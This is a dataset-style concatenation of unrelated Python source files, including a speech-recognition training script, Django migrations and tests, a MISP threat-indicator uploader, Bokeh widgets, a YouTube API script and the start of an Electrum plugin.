        input speech.

        Returns (classifier outputs, relative lengths) for the (possibly
        augmentation-expanded) batch.
        """
        batch = batch.to(self.device)
        wavs, lens = batch.sig
        if stage == sb.Stage.TRAIN:
            # Applying the augmentation pipeline
            # Slot 0 holds the clean (or last in-place augmented) waveforms.
            wavs_aug_tot = []
            wavs_aug_tot.append(wavs)
            for count, augment in enumerate(self.hparams.augment_pipeline):
                # Apply augment
                wavs_aug = augment(wavs, lens)
                # Managing speed change
                # Augmenters may alter the time dimension; trim or zero-pad
                # back to the original length so all variants can be stacked.
                if wavs_aug.shape[1] > wavs.shape[1]:
                    wavs_aug = wavs_aug[:, 0 : wavs.shape[1]]
                else:
                    zero_sig = torch.zeros_like(wavs)
                    zero_sig[:, 0 : wavs_aug.shape[1]] = wavs_aug
                    wavs_aug = zero_sig
                if self.hparams.concat_augment:
                    # Keep every augmented copy: batch grows by one variant.
                    wavs_aug_tot.append(wavs_aug)
                else:
                    # Replace in place: augmenters are applied sequentially
                    # to the same batch and the batch size is unchanged.
                    wavs = wavs_aug
                    wavs_aug_tot[0] = wavs
            wavs = torch.cat(wavs_aug_tot, dim=0)
            # n_augment is reused in compute_objectives to tile the labels
            # so they match the augmentation-expanded batch.
            self.n_augment = len(wavs_aug_tot)
            lens = torch.cat([lens] * self.n_augment)
        # Feature extraction and normalization
        feats = self.modules.compute_features(wavs)
        feats = self.modules.mean_var_norm(feats, lens)
        # Embeddings + speaker classifier
        embeddings = self.modules.embedding_model(feats)
        outputs = self.modules.classifier(embeddings)
        return outputs, lens
    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss using speaker-id as label.
        """
        predictions, lens = predictions
        uttid = batch.id
        spkid, _ = batch.spk_id_encoded
        # Concatenate labels (due to data augmentation)
        if stage == sb.Stage.TRAIN:
            spkid = torch.cat([spkid] * self.n_augment, dim=0)
        loss = self.hparams.compute_cost(predictions, spkid, lens)
        # Some schedulers step per batch rather than per epoch; only call
        # the hook if this scheduler exposes it.
        if stage == sb.Stage.TRAIN and hasattr(
            self.hparams.lr_annealing, "on_batch_end"
        ):
            self.hparams.lr_annealing.on_batch_end(self.optimizer)
        if stage != sb.Stage.TRAIN:
            # Track classification errors for valid/test reporting.
            self.error_metrics.append(uttid, predictions, spkid, lens)
        return loss
    def on_stage_start(self, stage, epoch=None):
        """Gets called at the beginning of an epoch."""
        if stage != sb.Stage.TRAIN:
            # Fresh error tracker per evaluation stage (used in compute_objectives).
            self.error_metrics = self.hparams.error_stats()
    def on_stage_end(self, stage, stage_loss, epoch=None):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            # Stash train stats so the VALID branch below can log both together.
            self.train_stats = stage_stats
        else:
            stage_stats["ErrorRate"] = self.error_metrics.summarize("average")
        # Perform end-of-iteration things, like annealing, logging, etc.
        if stage == sb.Stage.VALID:
            old_lr, new_lr = self.hparams.lr_annealing(epoch)
            sb.nnet.schedulers.update_learning_rate(self.optimizer, new_lr)
            self.hparams.train_logger.log_stats(
                stats_meta={"epoch": epoch, "lr": old_lr},
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            # Keep only the checkpoint with the best (lowest) error rate.
            self.checkpointer.save_and_keep_only(
                meta={"ErrorRate": stage_stats["ErrorRate"]},
                min_keys=["ErrorRate"],
            )
def dataio_prep(hparams):
    """Create the train/valid datasets and their data-processing pipelines.

    Arguments
    ---------
    hparams : dict
        Loaded hyperparameters; must provide "data_folder",
        "train_annotation", "valid_annotation", "sample_rate",
        "sentence_len", "random_chunk", and "save_folder".

    Returns
    -------
    train_data, valid_data : DynamicItemDataset
        Datasets yielding "id", "sig", and "spk_id_encoded".
    label_encoder : CategoricalEncoder
        Speaker-id encoder, fitted (or loaded) on the training speakers.
    """
    data_folder = hparams["data_folder"]
    # 1. Declarations:
    train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
        csv_path=hparams["train_annotation"],
        replacements={"data_root": data_folder},
    )
    valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
        csv_path=hparams["valid_annotation"],
        replacements={"data_root": data_folder},
    )
    datasets = [train_data, valid_data]
    label_encoder = sb.dataio.encoder.CategoricalEncoder()
    # Chunk length in samples for random-chunk training.
    snt_len_sample = int(hparams["sample_rate"] * hparams["sentence_len"])
    # 2. Define audio pipeline:
    @sb.utils.data_pipeline.takes("wav", "start", "stop", "duration")
    @sb.utils.data_pipeline.provides("sig")
    def audio_pipeline(wav, start, stop, duration):
        if hparams["random_chunk"]:
            duration_sample = int(duration * hparams["sample_rate"])
            # BUGFIX: clamp the range so utterances shorter than the
            # requested chunk no longer crash random.randint (which raises
            # ValueError on an empty range).  Short files simply yield a
            # shorter chunk starting at 0.
            max_start = max(0, duration_sample - snt_len_sample)
            start = random.randint(0, max_start)
            stop = min(start + snt_len_sample, duration_sample)
        else:
            start = int(start)
            stop = int(stop)
        num_frames = stop - start
        # Decode only the selected window instead of the whole file.
        sig, fs = torchaudio.load(
            wav, num_frames=num_frames, frame_offset=start
        )
        # (1, time) -> (time,)
        sig = sig.transpose(0, 1).squeeze(1)
        return sig
    sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)
    # 3. Define text pipeline:
    @sb.utils.data_pipeline.takes("spk_id")
    @sb.utils.data_pipeline.provides("spk_id", "spk_id_encoded")
    def label_pipeline(spk_id):
        yield spk_id
        spk_id_encoded = label_encoder.encode_sequence_torch([spk_id])
        yield spk_id_encoded
    sb.dataio.dataset.add_dynamic_item(datasets, label_pipeline)
    # 3. Fit encoder:
    # Load or compute the label encoder (with multi-GPU DDP support)
    lab_enc_file = os.path.join(hparams["save_folder"], "label_encoder.txt")
    label_encoder.load_or_create(
        path=lab_enc_file, from_didatasets=[train_data], output_key="spk_id",
    )
    # 4. Set output:
    sb.dataio.dataset.set_output_keys(datasets, ["id", "sig", "spk_id_encoded"])
    return train_data, valid_data, label_encoder
if __name__ == "__main__":
# This flag enables the inbuilt cudnn auto-tuner
torch.backends.cudnn.benchmark = True
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
# Initialize ddp (useful only for multi-GPU DDP training)
sb.utils.distributed.ddp_init_group(run_opts)
# Load hyperparameters file with command-line overrides
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# Download verification list (to exlude verification sentences from train)
veri_file_path = os.path.join(
hparams["save_folder"], os.path.basename(hparams["verification_file"])
)
download_file(hparams["verification_file"], veri_file_path)
# Dataset prep (parsing VoxCeleb and annotation into csv files)
from voxceleb_prepare import prepare_voxceleb # noqa
run_on_main(
prepare_voxceleb,
kwargs={
"data_folder": hparams["data_folder"],
"save_folder": hparams["save_folder"],
"verification_pairs_file": veri_file_path,
"splits": ["train", "dev"],
"split_ratio": [90, 10],
"seg_dur": hparams["sentence_len"],
},
)
# Dataset IO prep: creating Dataset objects and proper encodings for phones
train_data, valid_data, label_encoder = dataio_prep(hparams)
# Create experiment directory
sb.core.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# Brain class initialization
speaker_brain = SpeakerBrain(
modules=hparams["modules"],
opt_class=hparams["opt_class"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
# Training
speaker_brain.fit(
speaker_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["dataloader_options"],
valid_loader_kwargs=hparams["dataloader_options"],
)
| 34 | 85 | 0.646147 |
8a002813ec718f990c335a0eaf9b9b10703c3751 | 1,409 | py | Python | PARQUEIOT/apps/sistema/migrations/0003_auto_20160717_2239.py | Edwineverth/Parque-Inteligente-SD- | a25fe3e5ac974a151d2681a8001f2782747fb459 | [
"CC0-1.0"
] | null | null | null | PARQUEIOT/apps/sistema/migrations/0003_auto_20160717_2239.py | Edwineverth/Parque-Inteligente-SD- | a25fe3e5ac974a151d2681a8001f2782747fb459 | [
"CC0-1.0"
] | null | null | null | PARQUEIOT/apps/sistema/migrations/0003_auto_20160717_2239.py | Edwineverth/Parque-Inteligente-SD- | a25fe3e5ac974a151d2681a8001f2782747fb459 | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('sistema', '0002_dispositivo_dis_nombre'),
]
operations = [
migrations.AlterField(
model_name='dispositivo',
name='dis_fabricante',
field=models.CharField(max_length=50, verbose_name='Fabricante:'),
),
migrations.AlterField(
model_name='dispositivo',
name='dis_mac',
field=models.CharField(max_length=17, verbose_name='MAC:'),
),
migrations.AlterField(
model_name='dispositivo',
name='dis_nombre',
field=models.CharField(max_length=50, verbose_name='Nombre:'),
),
migrations.AlterField(
model_name='sensor',
name='id_dis',
field=models.ForeignKey(verbose_name='Dispositivo:', blank=True, to='sistema.Dispositivo', null=True),
),
migrations.AlterField(
model_name='sensor',
name='sen_nombre',
field=models.CharField(max_length=50, verbose_name='Nombre:'),
),
migrations.AlterField(
model_name='sensor',
name='sen_unidad_medida',
field=models.CharField(max_length=10, verbose_name='Unidad de Medida:'),
),
]
| 31.311111 | 114 | 0.587651 |
655c3545b94377f466d14883af33f5adad0c5743 | 3,754 | py | Python | Samples/MISP/script.py | OfficeGlobal/security-api-solutions | a19b412ae3aaff806d30197c19862017923398ba | [
"MIT"
] | null | null | null | Samples/MISP/script.py | OfficeGlobal/security-api-solutions | a19b412ae3aaff806d30197c19862017923398ba | [
"MIT"
] | null | null | null | Samples/MISP/script.py | OfficeGlobal/security-api-solutions | a19b412ae3aaff806d30197c19862017923398ba | [
"MIT"
] | null | null | null | from pymisp import PyMISP
import config
from collections import defaultdict
import datetime
from RequestManager import RequestManager
from RequestObject import RequestObject
from constants import *
import sys
from functools import reduce
def _get_events():
misp = PyMISP(config.misp_domain, config.misp_key, config.misp_verifycert)
if len(config.misp_event_filters) == 0:
return [event['Event'] for event in misp.search(values="")['response']]
events_for_each_filter = [
[event['Event'] for event in misp.search(**event_filter)['response']]
for event_filter in config.misp_event_filters
]
event_ids_for_each_filter = [set(event['id'] for event in events) for events in events_for_each_filter]
event_ids_intersection = reduce((lambda x, y: x & y), event_ids_for_each_filter)
return [event for event in events_for_each_filter[0] if event['id'] in event_ids_intersection]
def _graph_post_request_body_generator(parsed_events):
for event in parsed_events:
request_body_metadata = {
**{field: event[field] for field in REQUIRED_GRAPH_METADATA},
**{field: event[field] for field in OPTIONAL_GRAPH_METADATA if field in event},
'action': config.action,
'passiveOnly': config.passiveOnly,
'threatType': 'watchlist',
'targetProduct': config.targetProduct,
}
for request_object in event['request_objects']:
request_body = {
**request_body_metadata.copy(),
**request_object.__dict__,
'tags': request_body_metadata.copy()['tags'] + request_object.__dict__['tags']
}
yield request_body
def _handle_timestamp(parsed_event):
parsed_event['lastReportedDateTime'] = str(
datetime.datetime.fromtimestamp(int(parsed_event['lastReportedDateTime'])))
def _handle_diamond_model(parsed_event):
for tag in parsed_event['tags']:
if 'diamond-model:' in tag:
parsed_event['diamondModel'] = tag.split(':')[1]
def _handle_tlp_level(parsed_event):
for tag in parsed_event['tags']:
if 'tlp:' in tag:
parsed_event['tlpLevel'] = tag.split(':')[1]
if 'tlpLevel' not in parsed_event:
parsed_event['tlpLevel'] = 'red'
def main():
if '-r' in sys.argv:
RequestManager.read_tiindicators()
sys.exit()
config.verbose_log = ('-v' in sys.argv)
print('fetching & parsing data from misp...')
events = _get_events()
parsed_events = list()
for event in events:
parsed_event = defaultdict(list)
for key, mapping in EVENT_MAPPING.items():
parsed_event[mapping] = event.get(key, "")
parsed_event['tags'] = [tag['name'].strip() for tag in event.get("Tag", [])]
_handle_diamond_model(parsed_event)
_handle_tlp_level(parsed_event)
_handle_timestamp(parsed_event)
for attr in event['Attribute']:
if attr['type'] == 'threat-actor':
parsed_event['activityGroupNames'].append(attr['value'])
if attr['type'] == 'comment':
parsed_event['description'] += attr['value']
if attr['type'] in MISP_ACTIONABLE_TYPES:
parsed_event['request_objects'].append(RequestObject(attr))
parsed_events.append(parsed_event)
del events
total_indicators = sum([len(v['request_objects']) for v in parsed_events])
with RequestManager(total_indicators) as request_manager:
for request_body in _graph_post_request_body_generator(parsed_events):
print(f"request body: {request_body}")
request_manager.handle_indicator(request_body)
if __name__ == '__main__':
main()
| 37.168317 | 107 | 0.661694 |
5d038469afe98dca5d4733e65d15dc53828be670 | 178 | py | Python | src/mard/brazilian_document/__init__.py | Mardoqueu-Pimentel/mard-py | c448cf5803291a6b711ad1ea6062cbab30dbfa0c | [
"MIT"
] | null | null | null | src/mard/brazilian_document/__init__.py | Mardoqueu-Pimentel/mard-py | c448cf5803291a6b711ad1ea6062cbab30dbfa0c | [
"MIT"
] | 1 | 2020-03-12T17:57:53.000Z | 2020-03-24T20:36:44.000Z | src/mard/brazilian_document/__init__.py | Mardoqueu-Pimentel/mard-py | c448cf5803291a6b711ad1ea6062cbab30dbfa0c | [
"MIT"
] | null | null | null | from mard.brazilian_document.cnpj import (
cnpj_pattern, cnpj_formatter, cnpj_validator
)
from mard.brazilian_document.cpf import (
cpf_pattern, cpf_formatter, cpf_validator
)
| 25.428571 | 45 | 0.831461 |
250e7cf87ac4038880a7d94b45ab58f827e7ee0e | 2,350 | py | Python | ctdvis/widgets/paragraph.py | JohannesSMHI/ctdvis | f51d472eb59c032abcbf598c94c4480d952ac30a | [
"MIT"
] | null | null | null | ctdvis/widgets/paragraph.py | JohannesSMHI/ctdvis | f51d472eb59c032abcbf598c94c4480d952ac30a | [
"MIT"
] | null | null | null | ctdvis/widgets/paragraph.py | JohannesSMHI/ctdvis | f51d472eb59c032abcbf598c94c4480d952ac30a | [
"MIT"
] | null | null | null | # Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-09-11 15:33
@author: a002028
"""
from bokeh.models import Div
def header_line():
"""Return Div object."""
html_text = """
<html>
<body>
<hr>
</body>
</html>
"""
return Div(text=html_text)
def standard_block_header(text=None, width=300, height=40):
"""Return Div object."""
html_text = """
<style>
body {
text-align: left;
vertical-align: text-top;
}
.centered {
text-align: text-top;
vertical-align: text-top;
}
</style>
<div class="centered">
<h4>""" + text + """</h4>
</div>
"""
return Div(text=html_text, width=width, height=height)
def get_info_block():
"""Return Div object."""
text = """
<h4>Info links</h4>
<ul>
<li><a href="https://docs.bokeh.org/en/latest/docs/user_guide/tools.html" target="_blank">Bokeh toolbar info</a></li>
<li><a href="https://github.com/sharksmhi/sharkpylib/tree/master/sharkpylib/qc" target="_blank">SHARK-QC-library</a></li>
</ul>
<h4>QC routines</h4>
<ol>
<li>Range check</li>
<li>Increase check</li>
<li>Decrease check</li>
<li>Sensor diff check</li>
<li>Spike check</li>
</ol>
""" # noqa: E501
return Div(text=text, width=200, height=100)
def get_export_info_block(export_folder):
"""Return Div object."""
if export_folder:
text = f"""
<h4>Download steps:</h4>
<ol>
<li>Select series using "map-lasso" or "Shift-table-select"</li>
<li>Click on Download below</li>
</ol>
Datafiles will be downloaded to your data folder ({export_folder})
""" # noqa: E501
else:
text = """
<h4>Download steps:</h4>
<ol>
<li>Select series using "map-lasso" or "Shift-table-select"</li>
<li>Click on Download below</li>
</ol>
Select a folder for download after clicking on the green button below. If no valid folder is selected, datafiles will be downloaded to your computers download-folder (eg. "Hämtade filer")
""" # noqa: E501
return Div(text=text)
| 27.647059 | 195 | 0.581277 |
263dc433ea89a49aa75961102c133aaa817bd99c | 9,395 | py | Python | dpgs_sandbox/tests/test_apps.py | ktowen/django-pgschemas | 5487c82d7a44297e12b80ef899a9aee0b6879bc5 | [
"MIT"
] | 85 | 2019-01-03T02:22:03.000Z | 2022-03-09T23:15:56.000Z | dpgs_sandbox/tests/test_apps.py | ktowen/django-pgschemas | 5487c82d7a44297e12b80ef899a9aee0b6879bc5 | [
"MIT"
] | 52 | 2019-02-12T21:04:43.000Z | 2022-03-05T15:20:16.000Z | dpgs_sandbox/tests/test_apps.py | ktowen/django-pgschemas | 5487c82d7a44297e12b80ef899a9aee0b6879bc5 | [
"MIT"
] | 12 | 2019-01-31T02:36:06.000Z | 2021-06-15T22:06:12.000Z | from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, override_settings
BASE_DEFAULT = {"TENANT_MODEL": "shared_public.Tenant", "DOMAIN_MODEL": "shared_public.Domain", "URLCONF": ""}
class AppConfigTestCase(TestCase):
"""
Tests TENANTS settings is properly defined.
"""
def setUp(self):
self.app_config = apps.get_app_config("django_pgschemas")
@override_settings()
def test_missing_tenants(self):
del settings.TENANTS
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_tenant_dict()
self.assertEqual(str(ctx.exception), "TENANTS dict setting not set.")
@override_settings(TENANTS=list)
def test_wrong_type_tenants(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_tenant_dict()
self.assertEqual(str(ctx.exception), "TENANTS dict setting not set.")
@override_settings(TENANTS={})
def test_no_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'public' dict.")
@override_settings(TENANTS={"public": None})
def test_wrong_type_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'public' dict.")
@override_settings(TENANTS={"public": 4})
def test_other_type_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'public' dict.")
@override_settings(TENANTS={"public": {"URLCONF": ""}})
def test_urlconf_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'URLCONF' key.")
@override_settings(TENANTS={"public": {"WS_URLCONF": ""}})
def test_wsurlconf_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'WS_URLCONF' key.")
@override_settings(TENANTS={"public": {"DOMAINS": ""}})
def test_domains_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'DOMAINS' key.")
@override_settings(TENANTS={"public": {"FALLBACK_DOMAINS": ""}})
def test_fallback_domains_on_public(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_public_schema()
self.assertEqual(str(ctx.exception), "TENANTS['public'] cannot contain a 'FALLBACK_DOMAINS' key.")
@override_settings(TENANTS={})
def test_no_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'default' dict.")
@override_settings(TENANTS={"default": None})
def test_wrong_type_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'default' dict.")
@override_settings(TENANTS={"default": "wawa"})
def test_other_type_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS must contain a 'default' dict.")
@override_settings(TENANTS={"default": {"DOMAIN_MODEL": ""}})
def test_no_tenant_model_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] must contain a 'TENANT_MODEL' key.")
@override_settings(TENANTS={"default": {"TENANT_MODEL": ""}})
def test_no_domain_model_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] must contain a 'DOMAIN_MODEL' key.")
@override_settings(TENANTS={"default": {"TENANT_MODEL": None, "DOMAIN_MODEL": None}})
def test_no_urlconf_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] must contain a 'URLCONF' key.")
@override_settings(TENANTS={"default": {**BASE_DEFAULT, "DOMAINS": ""}})
def test_domains_on_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] cannot contain a 'DOMAINS' key.")
@override_settings(TENANTS={"default": {**BASE_DEFAULT, "FALLBACK_DOMAINS": ""}})
def test_fallback_domains_on_default(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default'] cannot contain a 'FALLBACK_DOMAINS' key.")
def test_repeated_clone_reference(self):
with override_settings(TENANTS={"public": {}, "default": {**BASE_DEFAULT, "CLONE_REFERENCE": "public"}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default']['CLONE_REFERENCE'] must be a unique schema name.")
with override_settings(TENANTS={"default": {**BASE_DEFAULT, "CLONE_REFERENCE": "default"}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_default_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['default']['CLONE_REFERENCE'] must be a unique schema name.")
def test_valid_schema_name(self):
with override_settings(TENANTS={"pg_whatever": {}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_overall_schemas()
self.assertEqual(str(ctx.exception), "'pg_whatever' is not a valid schema name.")
with override_settings(TENANTS={"&$&*": {}}):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_overall_schemas()
self.assertEqual(str(ctx.exception), "'&$&*' is not a valid schema name.")
@override_settings(TENANTS={"www": {}})
def test_domains_on_others(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_overall_schemas()
self.assertEqual(str(ctx.exception), "TENANTS['www'] must contain a 'DOMAINS' list.")
@override_settings(DATABASE_ROUTERS=())
def test_database_routers(self):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_complementary_settings()
self.assertEqual(
str(ctx.exception), "DATABASE_ROUTERS setting must contain 'django_pgschemas.routers.SyncRouter'."
)
def test_extra_search_paths(self):
with override_settings(
TENANTS={"public": {}, "default": BASE_DEFAULT, "www": {}}, PGSCHEMAS_EXTRA_SEARCH_PATHS=["public"]
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'public' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
with override_settings(
TENANTS={"public": {}, "default": BASE_DEFAULT, "www": {}}, PGSCHEMAS_EXTRA_SEARCH_PATHS=["default"]
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'default' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
with override_settings(
TENANTS={"public": {}, "default": BASE_DEFAULT, "www": {}}, PGSCHEMAS_EXTRA_SEARCH_PATHS=["www"]
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'www' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
with override_settings(
TENANTS={"public": {}, "default": {**BASE_DEFAULT, "CLONE_REFERENCE": "sample"}, "www": {}},
PGSCHEMAS_EXTRA_SEARCH_PATHS=["sample"],
):
with self.assertRaises(ImproperlyConfigured) as ctx:
self.app_config._check_extra_search_paths()
self.assertEqual(str(ctx.exception), "Do not include 'sample' on PGSCHEMAS_EXTRA_SEARCH_PATHS.")
@override_settings(TENANTS={"public": {}, "default": BASE_DEFAULT})
def test_all_good_here(self):
self.app_config.ready()
| 51.059783 | 119 | 0.687174 |
639ffacbcf7c6da21fd6e0653441b1d73a3268fe | 4,332 | py | Python | sloeplugins/sloeyoutube/sloeyoutubetree.py | sloe/chan | df144f30edd33eb749e39ccdf64687cc22449bf5 | [
"Apache-2.0"
] | 1 | 2018-01-05T11:36:50.000Z | 2018-01-05T11:36:50.000Z | sloeplugins/sloeyoutube/sloeyoutubetree.py | sloe/chan | df144f30edd33eb749e39ccdf64687cc22449bf5 | [
"Apache-2.0"
] | null | null | null | sloeplugins/sloeyoutube/sloeyoutubetree.py | sloe/chan | df144f30edd33eb749e39ccdf64687cc22449bf5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import cPickle
import logging
import os
from pprint import pformat, pprint
import time
import sloelib
from sloeyoutubeitem import SloeYouTubeItem
class SloeYouTubeTree(object):
IDMAP_CACHE_FILENAME = "youtubetree_idmap_cache.pickle"
IDMAP_CACHE_VALID_FILENAME = "youtubetree_idmap_cache.valid"
def __init__(self, session):
self.session = session
self.item_list = {}
self.id_map = {}
def _save_cache(self):
logging.info("Saving ID map cache from %s" % self.IDMAP_CACHE_FILENAME)
if os.path.exists(self.IDMAP_CACHE_VALID_FILENAME):
os.unlink(self.IDMAP_CACHE_VALID_FILENAME)
with open(self.IDMAP_CACHE_FILENAME, "wb") as file:
if file:
cPickle.dump(self.id_map, file)
with open(self.IDMAP_CACHE_VALID_FILENAME, "wb") as file:
file.write("Cache validated %s" % time.asctime())
def _load_cache(self):
if not os.path.exists(self.IDMAP_CACHE_VALID_FILENAME):
if os.path.exists(self.IDMAP_CACHE_FILENAME):
logging.warn("Ignoring cache file %s as not valid" % self.IDMAP_CACHE_FILENAME)
else:
logging.info("Loading ID map cache from %s" % self.IDMAP_CACHE_FILENAME)
file = open(self.IDMAP_CACHE_FILENAME, "rb")
if file:
id_map = cPickle.load(file)
self.id_map = id_map
def _get_channels(self):
channels = self.session().channels()
channel_list = channels.list(
mine=True,
part="contentDetails"
)
return channel_list.execute()["items"]
def read(self):
self._load_cache()
updated = True
for channel in self._get_channels():
uploads_list_id = channel["contentDetails"]["relatedPlaylists"]["uploads"]
playlistitems_list_request = self.session().playlistItems().list(
playlistId=uploads_list_id,
part="snippet",
maxResults=50
)
while playlistitems_list_request:
playlistitems_list_response = playlistitems_list_request.execute()
video_ids = []
video_specs = []
for playlist_item in playlistitems_list_response["items"]:
video_id = playlist_item["snippet"]["resourceId"]["videoId"]
video_spec = playlist_item["snippet"]
video_spec[u"sloemodified"] = False
video_ids.append(video_id)
video_specs.append(video_spec)
videolistitems_list_request = self.session().videos().list(
part=" id, snippet, contentDetails, fileDetails,liveStreamingDetails,player,processingDetails,recordingDetails,statistics,status,suggestions,topicDetails",
id = u",".join(video_ids)
)
videolistitems_list_response = videolistitems_list_request.execute()
for i, v in enumerate(videolistitems_list_response["items"]):
video_specs[i][u"sloevideo"] = v
for i, video_id in enumerate(video_ids):
# self.item_list[video_id] = SloeYouTubeItem(video_specs[i])
self.item_list[video_id].update_video_description("Sloecoach test video")
self.item_list[video_id].set_sloeid_tag("01234567890")
playlistitems_list_request = self.session().playlistItems().list_next(
playlistitems_list_request, playlistitems_list_response)
if updated:
self._save_cache()
def write(self):
for item_id, item in self.item_list.iteritems():
if item.get("sloemodified"):
logging.info("Item %s is modified - updating" % item_id)
self.update_item(item)
def update_item(self, item):
sloevideo = item.get("sloevideo")
videos_update_request = self.session().videos().update(
part="snippet",
body={
"id":sloevideo["id"],
"snippet":sloevideo["snippet"]
})
videos_update_request.execute()
def __repr__(self):
return "|YouTubeTree|%s" % pformat(self.item_list)
| 34.656 | 175 | 0.605494 |
d5845d5a701ac065d07651ac164419ff0bceff2d | 515 | py | Python | server/src/tests/samples/tryExcept1.py | jhutchings1/pyright | 2b8593a58a2aecc95dac49cce92fc16678cd4e14 | [
"MIT"
] | 1 | 2019-09-14T06:02:16.000Z | 2019-09-14T06:02:16.000Z | server/src/tests/samples/tryExcept1.py | jhutchings1/pyright | 2b8593a58a2aecc95dac49cce92fc16678cd4e14 | [
"MIT"
] | 4 | 2021-03-11T07:03:36.000Z | 2021-10-06T22:27:25.000Z | server/src/tests/samples/tryExcept1.py | jhutchings1/pyright | 2b8593a58a2aecc95dac49cce92fc16678cd4e14 | [
"MIT"
] | null | null | null | # This sample tests the name binder's handling of
# try/except/raise statements
def func1():
try:
pass
except:
raise
# This should generate an error because it's
# a "naked" raise statement.
raise
def foo(x, y) -> bool:
try:
z = x / y
except Exception as e:
return False
except:
raise Exception()
else:
return True
# This should not generate an error
# because this code is unreachable.
return 'hello'
| 16.09375 | 49 | 0.576699 |
f80326043c617c93d131993981bedc2f630bf3c6 | 2,786 | py | Python | electrum_pac/plugins/labels/qt.py | PACCommunity/electrum-PAC | bde9018f026c950de16ddab96e4ef818ded52566 | [
"MIT"
] | 2 | 2018-05-12T19:55:42.000Z | 2019-09-04T12:14:40.000Z | electrum_pac/plugins/labels/qt.py | PACCommunity/electrum-PAC | bde9018f026c950de16ddab96e4ef818ded52566 | [
"MIT"
] | null | null | null | electrum_pac/plugins/labels/qt.py | PACCommunity/electrum-PAC | bde9018f026c950de16ddab96e4ef818ded52566 | [
"MIT"
] | 15 | 2018-04-02T11:21:43.000Z | 2020-08-14T20:27:29.000Z | from functools import partial
import traceback
import sys
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import (QHBoxLayout, QLabel, QVBoxLayout)
from electrum_pac.plugin import hook
from electrum_pac.i18n import _
from electrum_pac.gui.qt import EnterButton
from electrum_pac.gui.qt.util import ThreadedButton, Buttons
from electrum_pac.gui.qt.util import WindowModalDialog, OkButton
from .labels import LabelsPlugin
class QLabelsSignalObject(QObject):
labels_changed_signal = pyqtSignal(object)
class Plugin(LabelsPlugin):
def __init__(self, *args):
